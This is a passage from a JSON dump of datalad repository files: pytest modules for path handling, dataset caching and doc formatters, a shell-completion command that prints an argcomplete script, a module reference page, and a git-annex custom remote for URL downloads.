target platform can deal with forward slashes\n# as os.path.sep, regardless of its native preferences\n@with_tree(tree={'subdir': {'testfile': 'testcontent'}})\ndef test_paths_with_forward_slashes(path=None):\n # access file with native absolute path spec\n print(path)\n ok_file_has_content(op.join(path, 'subdir', 'testfile'), 'testcontent')\n with chpwd(path):\n # native relative path spec\n ok_file_has_content(op.join('subdir', 'testfile'), 'testcontent')\n # posix relative path spec\n ok_file_has_content('subdir/testfile', 'testcontent')\n # abspath with forward slash path sep char\n ok_file_has_content(\n op.join(path, 'subdir', 'testfile').replace(op.sep, '/'),\n 'testcontent')\n\n\n#@with_tempfile(mkdir=True)\n# with_tempfile dereferences tempdir, so does not trigger the failure\n# on Yarik's laptop where TMPDIR=~/.tmp and ~/.tmp -> /tmp.\n# with_tree in turn just passes that ~/.tmp/ directory\n@with_tree(tree={})\ndef test_not_under_git(path=None):\n from datalad.distribution.dataset import require_dataset\n dsroot = get_dataset_root(path)\n assert dsroot is None, \"There must be no dataset above tmp %s. Got: %s\" % (path, dsroot)\n with chpwd(path):\n # And require_dataset must puke also\n assert_raises(\n Exception,\n require_dataset,\n None, check_installed=True, purpose='test'\n )\n\n\ndef test_no_empty_http_proxy():\n # in __init__ we might prune http_proxy if it is empty, so it must not be\n # empty if present\n assert os.environ.get('http_proxy', 'default')\n assert os.environ.get('https_proxy', 'default')\n\n\n@with_tree(tree={})\ndef test_git_config_warning(path=None):\n if 'GIT_AUTHOR_NAME' in os.environ:\n raise SkipTest(\"Found existing explicit identity config\")\n\n # Note: An easier way to test this, would be to just set GIT_CONFIG_GLOBAL\n # to point somewhere else. 
However, this is not supported by git before\n # 2.32. Hence, stick with changed HOME in this test, but be sure to unset a\n # possible GIT_CONFIG_GLOBAL in addition.\n\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(path))\n with chpwd(path), \\\n patch.dict('os.environ', patched_env, clear=True), \\\n swallow_logs(new_level=30) as cml:\n out = WitlessRunner().run(\n [sys.executable, '-c', 'import datalad'],\n protocol=StdOutErrCapture)\n assert_in(\"configure Git before\", out['stderr'])\n" }, { "alpha_fraction": 0.6346456408500671, "alphanum_fraction": 0.638582706451416, "avg_line_length": 35.28571319580078, "blob_id": "f36a4960725987e9769da9b095407ba40aff7085", "content_id": "eee89301cc0fcd47523913fa345b396af394a10a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2540, "license_type": "permissive", "max_line_length": 81, "num_lines": 70, "path": "/datalad/support/tests/test_due_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import logging\nfrom unittest.mock import patch\n\nfrom ...distribution import dataset as dataset_mod\nfrom ...distribution.dataset import Dataset\nfrom ...tests.utils_pytest import (\n swallow_logs,\n with_tempfile,\n)\nfrom ..due import (\n Doi,\n Text,\n due,\n)\nfrom ..due_utils import duecredit_dataset\nfrom ..external_versions import external_versions\n\n\n@with_tempfile(mkdir=True)\ndef test_duecredit_dataset(path=None):\n dataset = Dataset(path)\n\n # Verify that we do not call duecredit_dataset if due is not enabled\n # Seems can't patch.object.enabled so we will just test differently\n # depending on either enabled or not\n if not due.active:\n with patch.object(dataset_mod, 'duecredit_dataset') as cmdc:\n dataset.create()\n cmdc.assert_not_called()\n else:\n with patch.object(dataset_mod, 'duecredit_dataset') as cmdc:\n dataset.create()\n cmdc.assert_called_once_with(dataset)\n\n\n # note: doesn't crash even if we call it incorrectly (needs dataset)\n duecredit_dataset()\n\n # No metadata -- no citation ATM.\n # TODO: possibly reconsider - may be our catch-all should be used there\n # as well\n with patch.object(due, 'cite') as mcite:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n duecredit_dataset(dataset) # should not crash or anything\n # since no metadata - we issue warning and return without citing\n # anything\n cml.assert_logged(\n regex='.*Failed to obtain metadata.*Will not provide duecredit.*'\n )\n mcite.assert_not_called()\n\n # Below we will rely on duecredit Entries being comparable, so if\n # duecredit is available and does not provide __cmp__ we make it for now\n # Whenever https://github.com/duecredit/duecredit/pull/148 is merged, and\n # probably 0.7.1 released - we will eventually remove this monkey patching.\n # Checking if __eq__ was actually provided seems tricky on py2, so decided\n # to just do version comparison\n try:\n if external_versions['duecredit'] < '0.7.1':\n from duecredit.entries import DueCreditEntry\n def _entry_eq(self, other):\n return (\n (self._rawentry == other._rawentry) and\n (self._key == other._key)\n )\n DueCreditEntry.__eq__ = _entry_eq\n except:\n # assume that not present so donothing stubs would be used, and\n # we will just compare Nones\n pass\n" }, { "alpha_fraction": 0.6086796522140503, "alphanum_fraction": 0.6138285994529724, "avg_line_length": 28.55434799194336, "blob_id": 
"1b30e0d69f14a1cf4ec4cc1e6c188a81da1d27ff", "content_id": "85e3c237021919a22f3a2aa3b1404b10a23a7ff4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2719, "license_type": "permissive", "max_line_length": 199, "num_lines": 92, "path": "/datalad/interface/shell_completion.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A helper command to enable shell (bash, zsh) completion for DataLad\n\n\"\"\"\n__docformat__ = 'restructuredtext'\n\n\nfrom .base import Interface\n\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.exceptions import CapturedException\n\nfrom logging import getLogger\n\nlgr = getLogger(\"datalad.interface.shell_completion\")\n\n\n@build_doc\nclass ShellCompletion(Interface):\n \"\"\"Display shell script for enabling shell completion for DataLad.\n\n Output of this command should be \"sourced\" by the bash or zsh to enable\n shell completions provided by argcomplete.\n\n Example:\n\n $ source <(datalad shell-completion)\n $ datalad --<PRESS TAB to display available option>\n\n \"\"\"\n # XXX prevent common args from being added to the docstring\n _no_eval_results = True\n result_renderer = 'tailored'\n _params_ = {}\n\n @staticmethod\n @eval_results\n def __call__():\n \"\"\"\n \"\"\"\n try:\n import argcomplete\n except Exception as exc:\n lgr.error(\"argcomplete failed to import - completions unlikely to work.\"\n \" Check if it is installed: %s\", CapturedException(exc))\n content = \"\"\"\\\n# Universal completion script for DataLad with the core autogenerated by\n# python-argcomplete and only slightly improved to work for ZSH if sourced under ZSH.\n#\n# Instead of just running this command and seeing this output, do\n#\n# source <(datalad shell-completion)\n#\n# in your bash or zsh session.\n\nif [ \"${ZSH_VERSION:-}\" != \"\" ]; then\n autoload -U compinit && compinit\n autoload -U bashcompinit && bashcompinit\nfi\n\n_python_argcomplete() {\n local IFS='\u000b'\n COMPREPLY=( $(IFS=\"$IFS\" COMP_LINE=\"$COMP_LINE\" COMP_POINT=\"$COMP_POINT\" _ARGCOMPLETE_COMP_WORDBREAKS=\"$COMP_WORDBREAKS\" _ARGCOMPLETE=1 \"$1\" 8>&1 9>&2 1>/dev/null 2>/dev/null) )\n if [[ $? 
!= 0 ]]; then\n unset COMPREPLY\n fi\n}\n\ncomplete -o nospace -o default -F _python_argcomplete \"datalad\"\n\"\"\"\n yield get_status_dict(\n action='shell_completion',\n status='ok',\n content=content\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.ui import ui\n ui.message(res['content'])\n" }, { "alpha_fraction": 0.6380367875099182, "alphanum_fraction": 0.6399539709091187, "avg_line_length": 16.045751571655273, "blob_id": "4030e793697bdb68cf46e1792e031384ff6bde53", "content_id": "180f7f8f15a6ae5c8452093c4e4c0a5f3c34e8c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2608, "license_type": "permissive", "max_line_length": 77, "num_lines": 153, "path": "/docs/source/modref.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_modref:\n\n***********************\nPython module reference\n***********************\n\nThis module reference extends the manual with a comprehensive overview of the\navailable functionality built into datalad. Each module in the package is\ndocumented by a general summary of its purpose and the list of classes and\nfunctions it provides.\n\n\nHigh-level user interface\n=========================\n\nDataset operations\n------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.Dataset\n api.create\n api.create_sibling\n api.create_sibling_github\n api.create_sibling_gitlab\n api.create_sibling_gogs\n api.create_sibling_gitea\n api.create_sibling_gin\n api.create_sibling_ria\n api.drop\n api.get\n api.install\n api.push\n api.remove\n api.save\n api.status\n api.update\n api.unlock\n\n\nReproducible execution\n----------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.run\n api.rerun\n api.run_procedure\n\n\nPlumbing commands\n-----------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.clean\n api.clone\n api.copy_file\n api.create_test_dataset\n api.diff\n api.download_url\n api.foreach_dataset\n api.siblings\n api.sshrun\n api.subdatasets\n\nMiscellaneous commands\n----------------------\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n api.add_archive_content\n api.add_readme\n api.addurls\n api.check_dates\n api.configuration\n api.export_archive\n api.export_archive_ora\n api.export_to_figshare\n api.no_annex\n api.shell_completion\n api.wtf\n\nSupport functionality\n=====================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n cmd\n consts\n log\n utils\n version\n support.gitrepo\n support.annexrepo\n support.archives\n support.extensions\n customremotes.base\n customremotes.archives\n\nConfiguration management\n========================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n config\n\nTest infrastructure\n===================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n tests.utils_pytest\n tests.utils_testrepos\n tests.heavyoutput\n\nCommand interface\n=================\n\n.. currentmodule:: datalad\n.. autosummary::\n :toctree: generated\n\n interface.base\n\nCommand line interface infrastructure\n=====================================\n\n.. currentmodule:: datalad\n.. 
autosummary::\n :toctree: generated\n\n cli.exec\n cli.main\n cli.parser\n cli.renderer\n" }, { "alpha_fraction": 0.5940911769866943, "alphanum_fraction": 0.6008349657058716, "avg_line_length": 24.950000762939453, "blob_id": "5fa06e9c058b5492848874935226e3e6c68ee9ec", "content_id": "11fa31db26b442b8b59798e825cc717fff3bcaf0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3114, "license_type": "permissive", "max_line_length": 92, "num_lines": 120, "path": "/datalad/cli/tests/test_formatters.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\"\"\"\n\nimport importlib.util\nfrom io import StringIO as SIO\nfrom pathlib import Path\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_not_in,\n ok_,\n ok_startswith,\n)\n\nfile_path = \\\n Path(__file__).parents[3] / '_datalad_build_support' / 'formatters.py'\nif not file_path.exists():\n raise SkipTest(f'Cannot find {file_path}')\nspec = importlib.util.spec_from_file_location('formatters', file_path)\nfmt = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(fmt)\n\nfrom ..parser import setup_parser\n\ndemo_example = \"\"\"\n#!/bin/sh\n\nset -e\nset -u\n\n# BOILERPLATE\n\nHOME=IS_MY_CASTLE\n\n#% EXAMPLE START\n#\n# A simple start (on the command line)\n# ====================================\n#\n# Lorem ipsum\n#%\n\ndatalad install http://the.world.com\n\n#%\n# Epilog -- with multiline rubish sdoifpwjefw\n# vsdokvpsokdvpsdkv spdokvpskdvpoksd\n# pfdsvja329u0fjpdsv sdpf9p93qk\n#%\n\ndatalad imagine --too \\\\\n --much \\\\\n --too say \\\\\n yes=no\n\ndatalad shameful-command #% SKIP\n#%\n# The result is not comprehensible.\n#%\n\n#% EXAMPLE END\n\n# define shunit test cases below, or just anything desired\n\"\"\"\n\n\ndef test_cmdline_example_to_rst():\n # don't puke on nothing\n out = fmt.cmdline_example_to_rst(SIO(''))\n out.seek(0)\n ok_startswith(out.read(), '.. AUTO-GENERATED')\n out = fmt.cmdline_example_to_rst(SIO(''), ref='dummy')\n out.seek(0)\n assert_in('.. dummy:', out.read())\n # full scale test\n out = fmt.cmdline_example_to_rst(\n SIO(demo_example), ref='mydemo')\n out.seek(0)\n out_text = out.read()\n assert_in('.. 
code-block:: sh', out_text)\n assert_not_in('shame', out_text) # no SKIP'ed\n assert_not_in('#', out_text) # no comments\n\n\ndef test_parser_access():\n parsers = setup_parser(['datalad'], return_subparsers=True)\n # we have a bunch\n ok_(len(parsers) > 3)\n assert_in('install', parsers.keys())\n\n\ndef test_manpage_formatter():\n addonsections = {'mytest': \"uniquedummystring\"}\n\n parsers = setup_parser(['datalad'], return_subparsers=True)\n for p in parsers:\n mp = fmt.ManPageFormatter(\n p, ext_sections=addonsections).format_man_page(parsers[p])\n for section in ('SYNOPSIS', 'NAME', 'OPTIONS', 'MYTEST'):\n assert_in('.SH {0}'.format(section), mp)\n assert_in('uniquedummystring', mp)\n\n\ndef test_rstmanpage_formatter():\n parsers = setup_parser(['datalad'], return_subparsers=True)\n for p in parsers:\n mp = fmt.RSTManPageFormatter(p).format_man_page(parsers[p])\n for section in ('Synopsis', 'Description', 'Options'):\n assert_in('\\n{0}'.format(section), mp)\n assert_in('{0}\\n{1}'.format(p, '=' * len(p)), mp)\n" }, { "alpha_fraction": 0.5698767900466919, "alphanum_fraction": 0.5844682455062866, "avg_line_length": 39.182411193847656, "blob_id": "37a25baf7294f73682e037dd459a3a86f1761603", "content_id": "cc1222427b8f39a8909135f09391e96ccc51e78c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12336, "license_type": "permissive", "max_line_length": 79, "num_lines": 307, "path": "/datalad/tests/test_utils_cached_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Testing cached test dataset utils\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_cached_dataset import (\n cached_dataset,\n cached_url,\n get_cached_dataset,\n url2filename,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n assert_equal,\n assert_false,\n assert_in,\n assert_is,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_result_count,\n assert_true,\n skip_if_no_network,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n ensure_list,\n opj,\n)\n\nCACHE_PATCH_STR = \"datalad.tests.utils_cached_dataset.DATALAD_TESTS_CACHE\"\nCLONE_PATCH_STR = \"datalad.tests.utils_cached_dataset.Clone.__call__\"\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_get_cached_dataset(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n\n # store file-based values for testrepo-minimalds for readability:\n annexed_file = opj('inannex', 'animated.gif')\n annexed_file_key = \"MD5E-s144625--4c458c62b7ac8ec8e19c8ff14b2e34ad.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n # tuples to test (url, version, keys, class):\n test_cases = [\n\n # a simple testrepo\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"541cf855d13c2a338ff2803d4488daf0035e568f\",\n None,\n AnnexRepo),\n # Same repo, but request paths to be present. 
This should work\n # with a subsequent call, although the first one did not already\n # request any:\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"9dd8b56cc706ab56185f2ceb75fbe9de9b606724\",\n annexed_file_key,\n AnnexRepo),\n # Same repo again, but invalid version\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"nonexistent\",\n \"irrelevantkey\", # invalid version; don't even try to get the key\n AnnexRepo),\n # same thing with different name should be treated as a new thing:\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"git-annex\",\n None,\n AnnexRepo),\n # try a plain git repo to make sure we can deal with that:\n # Note, that we first need a test case w/o a `key` parameter to not\n # blow up the test when Clone is patched, resulting in a MagicMock\n # instead of a Dataset instance within get_cached_dataset. In the\n # second case it's already cached then, so the patched Clone is\n # never executed.\n (\"https://github.com/datalad/datalad.org\",\n None,\n None,\n GitRepo),\n (\"https://github.com/datalad/datalad.org\",\n \"gh-pages\",\n \"ignored-key\", # it's a git repo; don't even try to get a key\n GitRepo),\n\n ]\n for url, version, keys, cls in test_cases:\n target = cache_dir / url2filename(url)\n\n # assuming it doesn't exist yet - patched cache dir!\n in_cache_before = target.exists()\n with patch(CLONE_PATCH_STR) as exec_clone:\n try:\n ds = get_cached_dataset(url, version, keys)\n invalid_version = False\n except AssertionError:\n # should happen only if `version` wasn't found. Implies\n # that the dataset exists in cache (although not returned\n # due to exception)\n assert_true(version)\n assert_false(Dataset(target).repo.commit_exists(version))\n # mark for later assertions (most of them should still hold\n # true)\n invalid_version = True\n\n assert_equal(exec_clone.call_count, 0 if in_cache_before else 1)\n\n # Patch prevents actual execution. Now do it for real. Note, that\n # this might be necessary for content retrieval even if dataset was\n # in cache before.\n try:\n ds = get_cached_dataset(url, version, keys)\n except AssertionError:\n # see previous call\n assert_true(invalid_version)\n\n assert_is_instance(ds, Dataset)\n assert_true(ds.is_installed())\n assert_equal(target, ds.pathobj)\n assert_is_instance(ds.repo, cls)\n\n if keys and not invalid_version and \\\n AnnexRepo.is_valid_repo(ds.path):\n # Note: it's not supposed to get that content if passed\n # `version` wasn't available. get_cached_dataset would then\n # raise before and not download anything only to raise\n # afterwards.\n here = ds.config.get(\"annex.uuid\")\n where = ds.repo.whereis(ensure_list(keys), key=True)\n assert_true(all(here in remotes for remotes in where))\n\n # version check. 
Note, that all `get_cached_dataset` is supposed to\n # do, is verifying, that specified version exists - NOT check it\n # out\"\n if version and not invalid_version:\n assert_true(ds.repo.commit_exists(version))\n\n # re-execution\n with patch(CLONE_PATCH_STR) as exec_clone:\n try:\n ds2 = get_cached_dataset(url, version, keys)\n except AssertionError:\n assert_true(invalid_version)\n exec_clone.assert_not_called()\n # returns the same Dataset as before:\n assert_is(ds, ds2)\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_cached_dataset(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n ds_url = \"https://github.com/datalad/testrepo--minimalds\"\n name_in_cache = url2filename(ds_url)\n annexed_file = Path(\"inannex\") / \"animated.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n @cached_dataset(url=ds_url)\n def decorated_test1(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_not_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url, paths=str(annexed_file))\n def decorated_test2(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_in(here, where)\n assert_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url)\n def decorated_test3(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n # origin is the same cached dataset, that got this content in\n # decorated_test2 before. Should still be there. But \"here\" we\n # didn't request it\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url,\n version=\"541cf855d13c2a338ff2803d4488daf0035e568f\")\n def decorated_test4(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n # origin is the same cached dataset, that got this content in\n # decorated_test2 before. Should still be there. 
But \"here\" we\n # didn't request it\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_in(origin, where)\n\n assert_equal(ds.repo.get_hexsha(),\n \"541cf855d13c2a338ff2803d4488daf0035e568f\")\n\n return ds.pathobj, ds.repo.pathobj\n\n first_dspath, first_repopath = decorated_test1()\n second_dspath, second_repopath = decorated_test2()\n decorated_test3()\n decorated_test4()\n\n # first and second are not the same, only their origin is:\n assert_not_equal(first_dspath, second_dspath)\n assert_not_equal(first_repopath, second_repopath)\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_cached_url(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n\n ds_url = \"https://github.com/datalad/testrepo--minimalds\"\n name_in_cache = url2filename(ds_url)\n annexed_file = Path(\"inannex\") / \"animated.gif\"\n annexed_file_key = \"MD5E-s144625--4c458c62b7ac8ec8e19c8ff14b2e34ad.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n @cached_url(url=ds_url)\n def decorated_test1(url):\n # we expect a file-scheme url to a cached version of `ds_url`\n expect_origin_path = cache_dir / name_in_cache\n assert_equal(expect_origin_path.as_uri(),\n url)\n origin = Dataset(expect_origin_path)\n assert_true(origin.is_installed())\n assert_false(origin.repo.file_has_content(str(annexed_file)))\n\n decorated_test1()\n\n @cached_url(url=ds_url, keys=annexed_file_key)\n def decorated_test2(url):\n # we expect a file-scheme url to a \"different\" cached version of\n # `ds_url`\n expect_origin_path = cache_dir / name_in_cache\n assert_equal(expect_origin_path.as_uri(),\n url)\n origin = Dataset(expect_origin_path)\n assert_true(origin.is_installed())\n assert_true(origin.repo.file_has_content(str(annexed_file)))\n\n decorated_test2()\n\n # disable caching. Note, that in reality DATALAD_TESTS_CACHE is determined\n # on import time of datalad.tests.fixtures based on the config\n # \"datalad.tests.cache\". 
We patch the result here, not the config itself.\n with patch(CACHE_PATCH_STR, new=None):\n\n @cached_url(url=ds_url)\n def decorated_test3(url):\n # we expect the original url, since caching is disabled\n assert_equal(url, ds_url)\n\n decorated_test3()\n" }, { "alpha_fraction": 0.5584998726844788, "alphanum_fraction": 0.5598472952842712, "avg_line_length": 35.203250885009766, "blob_id": "946a57c1a8ade0a388e2cca3c7f89c6e76e79929", "content_id": "673c7695de2a41ea2ad4a5a0a613c46f9b590556", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4453, "license_type": "permissive", "max_line_length": 79, "num_lines": 123, "path": "/datalad/customremotes/datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Universal custom remote to support anything our downloaders support\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom urllib.parse import urlparse\n\nfrom datalad.downloaders.providers import Providers\nfrom datalad.support.exceptions import (\n CapturedException,\n TargetFileAbsent,\n)\nfrom datalad.utils import unique\n\nfrom datalad.customremotes import RemoteError\nfrom datalad.customremotes.base import AnnexCustomRemote\nfrom datalad.customremotes.main import main as super_main\n\nlgr = logging.getLogger('datalad.customremotes.datalad')\n\n\nclass DataladAnnexCustomRemote(AnnexCustomRemote):\n \"\"\"git-annex special-remote frontend for DataLad's downloader facility\n \"\"\"\n\n SUPPORTED_SCHEMES = ('http', 'https', 's3', 'shub')\n\n def __init__(self, annex, **kwargs):\n super().__init__(annex)\n\n self._providers = Providers.from_config_files()\n\n def transfer_retrieve(self, key, file):\n urls = []\n error_causes = []\n # TODO: priorities etc depending on previous experience or settings\n for url in self.gen_URLS(key):\n urls.append(url)\n try:\n downloaded_path = self._providers.download(\n url, path=file, overwrite=True\n )\n assert(downloaded_path == file)\n return\n except Exception as exc:\n ce = CapturedException(exc)\n debug_msg = f\"Failed to download {url} for key {key}: \" \\\n f\"{ce.format_with_cause()}\"\n self.message(debug_msg)\n error_causes.append(ce.format_with_cause())\n\n error_msg = f\"Failed to download from any of {len(urls)} locations\"\n if error_causes:\n error_msg += f' {unique(error_causes)}'\n raise RemoteError(error_msg)\n\n def checkurl(self, url):\n try:\n status = self._providers.get_status(url)\n props = dict(filename=status.filename, url=url)\n if status.size is not None:\n props['size'] = status.size\n return [props]\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\"Failed to check url %s: %s\" % (url, ce))\n return False\n\n def checkpresent(self, key):\n resp = None\n for url in self.gen_URLS(key):\n # somewhat duplicate of CHECKURL\n try:\n status = self._providers.get_status(url)\n if status: # TODO: anything specific to check???\n return True\n # TODO: for CHECKPRESENT-FAILURE we somehow need to figure out\n # that we can connect to that server but that specific url is\n # N/A, probably check the connection etc\n except 
TargetFileAbsent as exc:\n ce = CapturedException(exc)\n self.message(\n \"Target url %s file seems to be missing: %s\" % (url, ce))\n if not resp:\n # if it is already marked as UNKNOWN -- let it stay that\n # way but if not -- we might as well say that we can no\n # longer access it\n return False\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\n \"Failed to check status of url %s: %s\" % (url, ce))\n if resp is None:\n raise RemoteError(f'Could not determine presence of key {key}')\n else:\n return False\n\n def claimurl(self, url):\n scheme = urlparse(url).scheme\n if scheme in self.SUPPORTED_SCHEMES:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=DataladAnnexCustomRemote,\n remote_name='datalad',\n description=\\\n \"download content from various URLs (http{,s}, s3, etc) possibly \"\n \"requiring authentication or custom access mechanisms using \"\n \"DataLad's downloaders\",\n )\n" }, { "alpha_fraction": 0.6517948508262634, "alphanum_fraction": 0.654358983039856, "avg_line_length": 31.5, "blob_id": "937361a6ef38b4d4733f833b6ad72b6e0977542a", "content_id": "da2c6917f281745b639e44be97fb864d133134e9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1950, "license_type": "permissive", "max_line_length": 87, "num_lines": 60, "path": "/datalad/tests/test_utils_testrepos.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for test repositories\n\n\"\"\"\nfrom datalad.tests.utils_pytest import (\n assert_repo_status,\n ok_,\n ok_file_under_git,\n skip_if_on_windows,\n swallow_outputs,\n with_tempfile,\n)\nfrom datalad.tests.utils_testrepos import (\n BasicAnnexTestRepo,\n BasicGitTestRepo,\n)\n\n\ndef _test_BasicAnnexTestRepo(repodir):\n trepo = BasicAnnexTestRepo(repodir)\n trepo.create()\n assert_repo_status(trepo.path)\n ok_file_under_git(trepo.path, 'test.dat')\n ok_file_under_git(trepo.path, 'INFO.txt')\n ok_file_under_git(trepo.path, 'test-annex.dat', annexed=True)\n ok_(trepo.repo.file_has_content('test-annex.dat') is False)\n with swallow_outputs():\n trepo.repo.get('test-annex.dat')\n ok_(trepo.repo.file_has_content('test-annex.dat'))\n\n\n# Use of @with_tempfile() apparently is not friendly to test generators yet\n# so generating two tests manually\n# something is wrong with the implicit 